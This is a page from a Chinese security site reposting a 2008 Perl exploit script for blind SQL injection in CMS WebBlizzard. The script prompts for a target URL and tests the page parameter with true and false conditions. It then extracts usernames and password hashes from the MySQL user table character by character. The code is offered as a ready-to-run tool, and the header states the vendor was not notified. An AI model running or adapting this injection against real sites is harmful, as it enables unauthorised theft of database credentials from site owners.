首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 CMS WebBlizzard (index.php page) Blind SQL Injection Exploit 来源：Bl@ckbe@rD 作者：Bl 发布时间：2008-07-04   #/usr/bin/perl #|+| Vendor Not Notified #|+| Author: Bl@ckbe@rD #|+| Discovered On: 10 june  2008 #|+| greetz: InjEctOrs , underz0ne crew #--//--> # -- CMS webBlizzard  Blind SQL Injection Exploit -- #--//--> Exploit : use strict; use LWP::Simple; print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n"; print "-                                                                  -\n"; print "-                                                                  -\n"; print "-                                                                  -\n"; print "-         CMS WebBlizzard  Blind SQL Injection exploit             -\n"; print "-                                                                  -\n"; print "-                                                                  -\n"; print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n"; print "\nEnter URL (ie: http://site.com): "; chomp(my $url=<STDIN>); if(inject_test($url)) { print "Injecting.. Please Wait this could take several minutes..\n\n"; my $details = blind($url); print "Exploit Success! Admin Details: ".$details; exit; } sub blind { my $url    = shift; my $res    = undef; my $chr    = 48; my $substr = 1; my $done   = 1; while($done) { my $content = get($url."/index.php?page=6)  and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM mysql.user),".$substr.",1))=".$chr."/*"); if($content =~ /Previous/ && $chr == 94) { $done = 0; } elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; } else { $chr++; } } return $res; } sub inject_test { my $url     = shift; my $true    = get($url."/index.php?page=6) and 1=1 /*"); my $false   = get($url."/index.php?page=6) and 1=2 /*"); if($true =~ /Previous/ && $false !~ /Previous/) { print "\nTarget Site Vulnerable!\n\n"; return 1; } else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; } }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·phPortal 1.2 Multiple Remote F ·Joomla Component altas 1.0 Mul ·Joomla Component is 1.0.1 Mul ·Site@School <= 2.4.10 (fckedit ·Joomla Component QuickTime VR ·Thelia 1.3.5 Multiple Vulnerab ·PHP-Nuke Platinium <= 7.6.b.5 ·ImperialBB <= 2.3.5 Remote Fil ·his exploit abuses an old bug ·fuzzylime (cms) 3.01 Remote Co ·busybox uname format string ex ·CMailServer 5.4.6 (CMailCOM.dl   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved